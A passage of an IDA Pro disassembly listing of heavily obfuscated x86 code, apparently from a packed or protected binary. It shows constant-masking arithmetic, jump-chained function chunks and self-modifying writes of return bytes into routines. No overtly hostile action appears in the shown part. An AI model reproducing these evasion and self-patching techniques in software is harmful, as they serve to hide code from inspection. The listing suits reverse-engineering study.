; [00000001 BYTES: COLLAPSED FUNCTION nullsub_375. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		cmp	eax, edi
		jmp	loc_446C00
; ---------------------------------------------------------------------------

loc_44B30D:				; CODE XREF: y2kk37jd:0045BFF8j
		xor	edx, 9BECC6EDh
		sub	edx, 860C204Ch
		rol	edx, 14h
		add	edx, 0B4AEB962h
		mov	[edx], eax
		pop	edx
		jmp	loc_45C51A
; ---------------------------------------------------------------------------

loc_44B32A:				; DATA XREF: sub_4424CA+8D28o
		or	eax, eax
		jnz	loc_445E8E
		jmp	loc_452727
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E648

loc_44B337:				; CODE XREF: sub_44E648:loc_44D0D7j
		jz	loc_43D512
		jmp	loc_45583D
; END OF FUNCTION CHUNK	FOR sub_44E648
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454B16

loc_44B342:				; CODE XREF: sub_454B16:loc_454C6Ej
		push	eax
		call	sub_451634
; END OF FUNCTION CHUNK	FOR sub_454B16
; START	OF FUNCTION CHUNK FOR sub_44D302

loc_44B348:				; CODE XREF: sub_44D302:loc_4592A2j
		add	eax, 4D0EF12Ch
		sub	eax, 4A37EA2Ch
		add	eax, 0A34B1E20h
		push	offset sub_44CB8B
		jmp	loc_45A2F4
; END OF FUNCTION CHUNK	FOR sub_44D302
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458CE4

loc_44B365:				; CODE XREF: sub_458CE4-3F3Cj
		jmp	sub_4526B7
; END OF FUNCTION CHUNK	FOR sub_458CE4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453A10

loc_44B36A:				; CODE XREF: sub_453A10+16j
		jmp	loc_441DED
; END OF FUNCTION CHUNK	FOR sub_453A10
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453867

loc_44B36F:				; CODE XREF: sub_453867-FAD8j
		jmp	loc_4496A5
; END OF FUNCTION CHUNK	FOR sub_453867
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4436E7

loc_44B374:				; CODE XREF: sub_4436E7:loc_43FAC7j
		mov	eax, ebx
		xchg	eax, [esp+10h+var_10]
		push	1216DA3Ah
		pop	ebx
		or	ebx, 62BB18E7h
		jmp	loc_44D6D8
; END OF FUNCTION CHUNK	FOR sub_4436E7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BD20

loc_44B38A:				; CODE XREF: sub_44BD20+AD8Cj
		jl	loc_44BCD5
		push	167DA2ABh

loc_44B395:				; CODE XREF: sub_44BD20-E47Bj
		or	ecx, 892EA083h
		test	ecx, 2
		jmp	loc_458F55
; END OF FUNCTION CHUNK	FOR sub_44BD20
; ---------------------------------------------------------------------------

loc_44B3A6:				; CODE XREF: y2kk37jd:00456CC8j
		pushf
; START	OF FUNCTION CHUNK FOR sub_448F60

loc_44B3A7:				; CODE XREF: sub_448F60:loc_456CBBj
		add	edx, 173A7944h
		xor	eax, edx
		pop	edx
; END OF FUNCTION CHUNK	FOR sub_448F60
; START	OF FUNCTION CHUNK FOR sub_442C0A

loc_44B3B0:				; CODE XREF: sub_442C0A:loc_43C5BEj
		rol	eax, 12h
		push	esi
		push	0A052F580h
		xchg	edi, [esp+0]
		jmp	loc_4553EC
; END OF FUNCTION CHUNK	FOR sub_442C0A
; ---------------------------------------------------------------------------
		db 0Fh,	8Ah, 0CFh
		dd 0E9000047h, 0FFFF0E09h
; ---------------------------------------------------------------------------

loc_44B3CC:				; CODE XREF: y2kk37jd:00441978j
		xor	esi, eax
		mov	esi, ebx
		sbb	ecx, 0C0B20DE1h
; START	OF FUNCTION CHUNK FOR sub_44FB21

loc_44B3D6:				; CODE XREF: sub_44FB21:loc_44196Bj
		add	esi, 4C49E0A6h
		jmp	loc_44C9D3
; END OF FUNCTION CHUNK	FOR sub_44FB21
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_260. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4496C2

loc_44B3E2:				; CODE XREF: sub_4496C2+16j
		sub	ebx, 0A29C435Eh
		or	ebx, 246B2B83h
		add	ebx, 0C3C264ADh
		mov	[ebx], eax
		pop	ebx
		lea	eax, sub_44A3E7
		mov	byte ptr [eax],	0C3h
		jmp	sub_44A3E7
; END OF FUNCTION CHUNK	FOR sub_4496C2

; =============== S U B	R O U T	I N E =======================================



sub_44B405	proc near		; CODE XREF: sub_402129+B3p
					; sub_44B405:loc_458664j
					; DATA XREF: ...

; FUNCTION CHUNK AT 00456257 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458664 SIZE 00000006 BYTES

		call	sub_45866A
		jmp	loc_456257
sub_44B405	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BD0D

loc_44B40F:				; CODE XREF: sub_43BD0D+B8B2j
		jbe	loc_45310A
		and	edi, 480EB7Eh

loc_44B41B:				; CODE XREF: sub_43BD0D:loc_4475B5j
		xor	ecx, 335984CFh
		xor	eax, ecx
		xchg	edx, [esp+4+var_4]
		mov	ecx, edx
		pop	edx
		push	offset loc_450B8E
		jmp	nullsub_184
; END OF FUNCTION CHUNK	FOR sub_43BD0D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E07B

loc_44B433:				; CODE XREF: sub_43E07B:loc_44D6E9j
		call	sub_4487FD
		mov	eax, 86480F55h
		push	ecx
		mov	ecx, esi
		xchg	ecx, [esp+4+var_4]
		push	66ECA178h
		pop	esi
		jmp	loc_44CC8E
; END OF FUNCTION CHUNK	FOR sub_43E07B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BD0D

loc_44B44E:				; CODE XREF: sub_43BD0D+2229j
		jb	loc_451EB5

loc_44B454:				; CODE XREF: sub_43BD0D:loc_4460AFj
		push	8EB3C415h
		xchg	edi, [esp+8+var_8]

loc_44B45C:				; CODE XREF: y2kk37jd:0043B911j
		mov	eax, edi
		pop	edi
		add	eax, 892C9995h
		jmp	loc_453CDE
; END OF FUNCTION CHUNK	FOR sub_43BD0D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44255B

loc_44B46A:				; CODE XREF: sub_44255B+FE35j
		add	eax, [ebp-4]
		add	eax, 18h
		mov	[ebp-10h], eax
		mov	eax, [ebp-10h]
		mov	eax, [eax+60h]
		jmp	loc_45148D
; END OF FUNCTION CHUNK	FOR sub_44255B

; =============== S U B	R O U T	I N E =======================================



sub_44B47E	proc near		; CODE XREF: sub_455DD8-181CFj

; FUNCTION CHUNK AT 00448334 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C4FB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D856 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00451C71 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0045368C SIZE 00000014 BYTES

		add	esp, 0FFFFFFE4h
		jmp	loc_45368C
sub_44B47E	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_44B486:				; CODE XREF: y2kk37jd:004513C4j
		mov	ecx, [ebp+0]

; =============== S U B	R O U T	I N E =======================================



sub_44B489	proc near		; CODE XREF: sub_4504DD-10B35p

; FUNCTION CHUNK AT 0043DE65 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043FD4F SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00441180 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00442734 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004476B6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044BA8A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044ED0B SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044F227 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0044FC46 SIZE 00000002 BYTES
; FUNCTION CHUNK AT 004544BB SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00456478 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00457EF2 SIZE 0000000B BYTES

		xchg	edi, [esp+0]

loc_44B48C:				; CODE XREF: y2kk37jd:loc_43E779j
		pop	edi
		push	edx
		call	sub_4504DD
		mov	eax, 0A4C05BA6h
		push	eax
		push	36D58705h
		pop	eax
		or	eax, 2F713BDBh
		jmp	loc_44ED0B
sub_44B489	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_44B4AA	proc near		; DATA XREF: sub_4411C3+1A0FEo

; FUNCTION CHUNK AT 0043F18F SIZE 00000005 BYTES

		push	0BB17A52Fh
		push	offset loc_4426BF

loc_44B4B4:				; CODE XREF: y2kk37jd:00458D5Cj
		jmp	loc_43F18F
sub_44B4AA	endp

; ---------------------------------------------------------------------------

loc_44B4B9:				; CODE XREF: y2kk37jd:loc_456241j
		xchg	ebx, [esp]
		push	3FD0FD86h
		xchg	ecx, [esp]
		mov	edx, ecx
		pop	ecx
		jmp	loc_45717B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4458DD

loc_44B4CC:				; CODE XREF: sub_4458DD:loc_4495CEj
					; y2kk37jd:004495E5j
		xor	edi, 0FCA76122h
		add	edi, 0A72657D5h
		popf
		add	eax, edi
		pop	edi
		jmp	loc_45ABF6
; END OF FUNCTION CHUNK	FOR sub_4458DD

; =============== S U B	R O U T	I N E =======================================



sub_44B4E1	proc near		; DATA XREF: y2kk37jd:0045BA5Eo

; FUNCTION CHUNK AT 00441698 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0044EBB3 SIZE 00000016 BYTES

		xchg	eax, [esp+0]
		mov	esi, eax
		pop	eax
		add	esi, 35B1BF4Ah
		test	esi, 1000000h
		jmp	loc_44EBB3
sub_44B4E1	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_373. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453FBA

loc_44B4F9:				; CODE XREF: sub_453FBA+12j
		jmp	loc_451E69
; END OF FUNCTION CHUNK	FOR sub_453FBA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451C7D

loc_44B4FE:				; CODE XREF: sub_451C7D+Ej
		jmp	loc_440420
; END OF FUNCTION CHUNK	FOR sub_451C7D
; ---------------------------------------------------------------------------

loc_44B503:				; CODE XREF: y2kk37jd:00446DB5j
		jmp	loc_4471BE

; =============== S U B	R O U T	I N E =======================================



sub_44B508	proc near		; CODE XREF: y2kk37jd:0043C664j
					; sub_448C11p

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043FA10 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00442655 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004438E7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044470B SIZE 00000021 BYTES
; FUNCTION CHUNK AT 004465A8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448C49 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044C1AD SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044CB18 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044D22F SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00451045 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004527DF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457EA6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458044 SIZE 00000008 BYTES

		xchg	esi, [esp+4+var_4]
		pop	esi
		jo	sub_44AFF6
		push	ebp
		mov	ebp, esp
		jmp	loc_4438E7
sub_44B508	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_44B51A	proc near		; CODE XREF: sub_441AAB+Dp
					; y2kk37jd:0044BC08j

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 004536B5 SIZE 00000005 BYTES

		xchg	esi, [esp+0]
		pop	esi
		add	ebx, 5BE4D964h
		xchg	ebx, [esp-4+arg_0]
		jmp	loc_4536B5
sub_44B51A	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45709E

loc_44B52C:				; CODE XREF: sub_45709E:loc_44C11Dj
		jl	loc_455F80
; END OF FUNCTION CHUNK	FOR sub_45709E
; START	OF FUNCTION CHUNK FOR sub_4458DD

loc_44B532:				; CODE XREF: sub_4458DD+29E7j
		jmp	loc_447F9D
; END OF FUNCTION CHUNK	FOR sub_4458DD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4440AB

loc_44B537:				; CODE XREF: sub_4440AB+8DF2j
		jp	loc_45129C
		and	ecx, edi
		push	eax
		jmp	loc_43D083
; END OF FUNCTION CHUNK	FOR sub_4440AB
; ---------------------------------------------------------------------------
		mov	[ebx], edi
		jmp	sub_4514DE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449DFE

loc_44B54C:				; CODE XREF: sub_449DFE+7EA0j
		jz	loc_43CC4C
		jmp	loc_45A943
; END OF FUNCTION CHUNK	FOR sub_449DFE
; ---------------------------------------------------------------------------

loc_44B557:				; CODE XREF: y2kk37jd:00454100j
		or	ecx, 8937A634h

; =============== S U B	R O U T	I N E =======================================



sub_44B55D	proc near		; CODE XREF: sub_45B7AA-FF04p

; FUNCTION CHUNK AT 0043D032 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F5A4 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00440C7F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004445DD SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00446B67 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00452FD6 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00453B8A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004550F7 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00456301 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0045A3D2 SIZE 0000000B BYTES

		xchg	eax, [esp+0]
		pop	eax
		add	edx, 0B6F7B2B8h
		add	edx, ebp
		jmp	loc_456301
sub_44B55D	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4438B1

loc_44B56E:				; CODE XREF: sub_4438B1-61A3j
		xor	edx, 0ED9BED54h
		push	offset loc_45759E
		jmp	nullsub_189
; END OF FUNCTION CHUNK	FOR sub_4438B1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4458DD

loc_44B57E:				; CODE XREF: sub_4458DD:loc_43D4A0j
		add	esi, 1E4B46DAh
		jmp	loc_44C069
; END OF FUNCTION CHUNK	FOR sub_4458DD

; =============== S U B	R O U T	I N E =======================================



sub_44B589	proc near		; DATA XREF: sub_444773+14o

; FUNCTION CHUNK AT 00444158 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00447EC1 SIZE 00000005 BYTES

		add	eax, eax
		jmp	loc_447EC1
sub_44B589	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4421DC

loc_44B590:				; CODE XREF: sub_4421DC+16D49j
		add	eax, [esp+0]
		adc	edx, [esp+arg_0]
		add	esp, 8
		mov	eax, [eax]
		push	ecx
		jmp	loc_43BF4F
; END OF FUNCTION CHUNK	FOR sub_4421DC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B79D

loc_44B5A2:				; CODE XREF: sub_44B79D:loc_44F665j
		or	eax, 0C778DE3Eh
		jmp	loc_44E11B
; END OF FUNCTION CHUNK	FOR sub_44B79D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4458DD

loc_44B5AD:				; CODE XREF: sub_4458DD:loc_4531CCj
		mov	edx, ecx
		push	offset loc_43CCAD
		jmp	loc_449002
; END OF FUNCTION CHUNK	FOR sub_4458DD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453583

loc_44B5B9:				; CODE XREF: sub_453583:loc_4440D9j
		jnz	loc_449DBF

loc_44B5BF:				; CODE XREF: sub_43D61E+A670j
		jmp	sub_442C3E
; END OF FUNCTION CHUNK	FOR sub_453583
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EF4F

loc_44B5C4:				; CODE XREF: sub_43EF4F-2766j
					; y2kk37jd:00451FA6j
		jmp	loc_455A79
; END OF FUNCTION CHUNK	FOR sub_43EF4F
; ---------------------------------------------------------------------------
		mov	ebx, 853A817Eh
		jmp	loc_449DBD
; ---------------------------------------------------------------------------

loc_44B5D3:				; CODE XREF: y2kk37jd:0044EE11j
		jno	loc_45A7A0

loc_44B5D9:				; CODE XREF: y2kk37jd:loc_440B8Ej
		lea	eax, [ebp-14h]
		push	eax
		push	ebx
		push	8718E00h
		pop	ebx
		jmp	loc_446D5E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_44B5E9:				; CODE XREF: sub_445226:loc_451E90j
		rol	eax, 1Bh
		sub	eax, ds:4000EBh
		xor	eax, 1296BD3Bh
		add	eax, ebp
		add	eax, 857615D9h
		mov	eax, [eax]
		jmp	loc_442133
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_44B607:				; CODE XREF: sub_4448E2-7CCFj
		sub	al, 99h
		call	sub_4490B4

loc_44B60E:				; CODE XREF: sub_45447D-17227j
		jmp	loc_4428C5
; END OF FUNCTION CHUNK	FOR sub_4448E2

; =============== S U B	R O U T	I N E =======================================



sub_44B613	proc near		; DATA XREF: y2kk37jd:00443513o

; FUNCTION CHUNK AT 0045083A SIZE 00000005 BYTES

		xor	eax, 0F24FF03Dh
		mov	edx, [esp+0]
		push	eax
		mov	eax, edx
		jmp	loc_45083A
sub_44B613	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F75D

loc_44B624:				; CODE XREF: sub_43F75D:loc_4408A2j
		pushf
		push	31259083h
		pop	edx
		xor	edx, 7F2461ACh
		add	edx, 0B243B0EDh
		popf
		xchg	edx, [esp+8+var_8]
		jmp	sub_454413
; END OF FUNCTION CHUNK	FOR sub_43F75D
; ---------------------------------------------------------------------------
		xor	ebp, 9906D335h
		jmp	sub_456136
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4460E8

loc_44B64B:				; CODE XREF: sub_4460E8:loc_45B4E4j
		jge	loc_453C9C
; END OF FUNCTION CHUNK	FOR sub_4460E8
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_44B651:				; CODE XREF: sub_4448E2+15BFj
		jmp	loc_44DAB9
; END OF FUNCTION CHUNK	FOR sub_4448E2
; ---------------------------------------------------------------------------
		not	edi
		jmp	loc_453C89
; ---------------------------------------------------------------------------

loc_44B65D:				; CODE XREF: y2kk37jd:loc_44E3B2j
					; y2kk37jd:00452EFEj
		and	ebx, 5A38C162h

; =============== S U B	R O U T	I N E =======================================



sub_44B663	proc near		; CODE XREF: y2kk37jd:0044E608p

; FUNCTION CHUNK AT 0044380F SIZE 0000000B BYTES

		xchg	esi, [esp+0]
		pop	esi
		adc	ecx, eax
		cmp	ebx, 99FEE0A1h
		sub	ecx, edx
		pop	eax

loc_44B672:				; CODE XREF: y2kk37jd:00452A02j
		jmp	loc_44380F
sub_44B663	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_44B677	proc near		; DATA XREF: sub_456742+5o
		pushf
		push	offset loc_44A062
		jmp	nullsub_486
sub_44B677	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4507BF

loc_44B682:				; CODE XREF: sub_4507BF:loc_4470C8j
		jz	loc_44569A
		jmp	loc_446238
; END OF FUNCTION CHUNK	FOR sub_4507BF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455BE9

loc_44B68D:				; CODE XREF: sub_455BE9:loc_44BCB5j
		mov	ebx, ebp
		xchg	ebx, [esp+4+var_4]
		mov	ebp, esp

loc_44B694:				; CODE XREF: y2kk37jd:loc_44AD67j
		push	edi
		mov	edi, ecx
		xchg	edi, [esp+8+var_8]
		push	edx
		push	offset loc_455859
		jmp	locret_445586
; END OF FUNCTION CHUNK	FOR sub_455BE9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4590D6

loc_44B6A5:				; CODE XREF: sub_4590D6-1363Fj
		and	ax, 38FFh
		call	sub_43E2D2
; END OF FUNCTION CHUNK	FOR sub_4590D6
; START	OF FUNCTION CHUNK FOR sub_43F2F2

loc_44B6AE:				; CODE XREF: sub_43F2F2:loc_4447D7j
		jz	loc_44EF5C
		jmp	loc_451C4E
; END OF FUNCTION CHUNK	FOR sub_43F2F2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_44B6B9:				; CODE XREF: sub_445226+ECC8j
		mov	edx, ecx

loc_44B6BB:				; CODE XREF: sub_445226:loc_44ED54j
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_45ADE2
		jmp	loc_44AD96
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454539

loc_44B6CC:				; CODE XREF: sub_454539:loc_44DA44j
		call	sub_43C326
		push	828CE5DBh
		pop	eax
		sub	eax, 0BE290D65h
		and	eax, 8C89D884h
		jmp	loc_4513B3
; END OF FUNCTION CHUNK	FOR sub_454539

; =============== S U B	R O U T	I N E =======================================



sub_44B6E8	proc near		; DATA XREF: y2kk37jd:004510E0o

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 004458BD SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004507E6 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 004577E4 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0045BC71 SIZE 0000001A BYTES

		pop	edi
		jnb	loc_4458BD
		mov	eax, [esp+0]
		push	edx
		push	ecx
		push	0DACE9949h
		pop	ecx
		jmp	loc_45BC71
sub_44B6E8	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440AA5

loc_44B6FF:				; CODE XREF: sub_440AA5+FC3Bj
		pop	eax
		mov	eax, [esp-4+arg_0]

loc_44B703:				; CODE XREF: sub_4448E2:loc_4528EFj
		push	ecx
		mov	ecx, edx
		xchg	ecx, [esp+0]
; END OF FUNCTION CHUNK	FOR sub_440AA5
; START	OF FUNCTION CHUNK FOR sub_43F770

loc_44B709:				; CODE XREF: sub_43F770:loc_4440EFj
		jmp	loc_458B86
; END OF FUNCTION CHUNK	FOR sub_43F770
; ---------------------------------------------------------------------------
		mov	ds:dword_41E104, eax
		lea	eax, nullsub_261
		mov	byte ptr [eax],	0C3h
		jmp	loc_44BFB0
; ---------------------------------------------------------------------------

loc_44B722:				; CODE XREF: y2kk37jd:0044E8B1j
		mov	eax, [esp]
		push	edx
		push	ecx
		jmp	loc_45A090
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440EC8

loc_44B72C:				; CODE XREF: sub_440EC8+4283j
		mov	[esi], eax
		pop	esi
		push	0
		push	1A2282DCh
		pop	eax
		jmp	loc_45B419
; END OF FUNCTION CHUNK	FOR sub_440EC8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D302

loc_44B73C:				; CODE XREF: y2kk37jd:004592E1j
					; sub_44D302:loc_45B638j
		sbb	ecx, 85D52375h
		jmp	loc_43FF89
; END OF FUNCTION CHUNK	FOR sub_44D302
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4486B1

loc_44B747:				; CODE XREF: sub_4486B1:loc_450FDAj
		push	5AA2BB9h
		pop	esi
		rol	esi, 2
		sub	esi, 3FC0021Dh
		add	esi, 295CFBE6h
		jmp	loc_45B7E8
; END OF FUNCTION CHUNK	FOR sub_4486B1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454413

loc_44B761:				; CODE XREF: sub_454413:loc_4531D1j
		mov	edx, ecx
		xchg	edx, [esp+0]
		push	esi
		push	91CC6B94h
		pop	esi
		xor	esi, 2F2B773Ah
		jnz	loc_43DD59

loc_44B779:				; CODE XREF: y2kk37jd:004487EAj
		jmp	loc_4565EE
; END OF FUNCTION CHUNK	FOR sub_454413
; ---------------------------------------------------------------------------
		jl	loc_444D7B
		jmp	loc_43DD4D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C46D

loc_44B789:				; CODE XREF: sub_43C46D-61Fj
		or	edx, 84DACC44h
		add	edx, 3164F4ECh

loc_44B795:				; CODE XREF: y2kk37jd:loc_43E91Bj
		xchg	edx, [esp-4+arg_0]
		jmp	loc_45526B
; END OF FUNCTION CHUNK	FOR sub_43C46D

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_44B79D	proc near		; CODE XREF: sub_4460D0j

; FUNCTION CHUNK AT 00447E8E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449033 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044B5A2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044E11B SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044F665 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004529B8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B6D9 SIZE 0000001B BYTES

		push	ebp
		mov	ebp, esp
		push	ecx
		mov	esp, ebp
		pop	ebp
		mov	eax, ds:dword_44585C
		or	eax, eax
		jnz	loc_44E9F7
		jmp	loc_447E8E
sub_44B79D	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454210

loc_44B7B7:				; CODE XREF: sub_454210+10j
		and	ebx, 43D36AE3h
		rol	ebx, 19h
		xor	ebx, ds:4000ECh
		add	ebx, 307FDA85h
		mov	[ebx], eax
		pop	ebx
		jmp	loc_44E99A
; END OF FUNCTION CHUNK	FOR sub_454210
; ---------------------------------------------------------------------------

loc_44B7D4:				; CODE XREF: y2kk37jd:0044E556j
		sub	edi, eax
		jmp	loc_43B8F9

; =============== S U B	R O U T	I N E =======================================



sub_44B7DB	proc near		; CODE XREF: y2kk37jd:00443A9Cj
					; sub_4429DD+17DBp
		xchg	edi, [esp+0]
		pop	edi
		mov	ds:off_41E000, eax
		call	sub_4429DD

locret_44B7EA:				; CODE XREF: sub_447D0B+10015j
		retn
sub_44B7DB	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E658

loc_44B7EB:				; CODE XREF: sub_43E658+AB27j
		cmp	edx, 0F4F45376h
		jmp	loc_43F37B
; END OF FUNCTION CHUNK	FOR sub_43E658
; ---------------------------------------------------------------------------
		jg	loc_450207
		jmp	sub_43CB44
; ---------------------------------------------------------------------------

loc_44B801:				; DATA XREF: sub_450CD6+Ao
		push	ecx
		mov	ecx, eax
		xchg	ecx, [esp]
		push	0
		push	eax

loc_44B80A:				; CODE XREF: y2kk37jd:loc_45183Dj
		push	offset loc_44A99E
		jmp	locret_44AD90

; =============== S U B	R O U T	I N E =======================================



sub_44B814	proc near		; CODE XREF: sub_43D4CE-1385p
					; y2kk37jd:0044BD0Bp

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 0043B2B5 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0043CAF2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043CD26 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D066 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440877 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004408B4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442403 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00442F96 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 004447B5 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 00446660 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446757 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004482A5 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004486BC SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00448AEC SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044A0D2 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044B9AC SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044D38F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044D404 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044EA85 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044EAFE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F838 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044FAED SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00450A31 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00451D97 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452706 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00453A6F SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00454869 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00455133 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00455389 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0045551A SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00456E6C SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00458A5D SIZE 00000017 BYTES
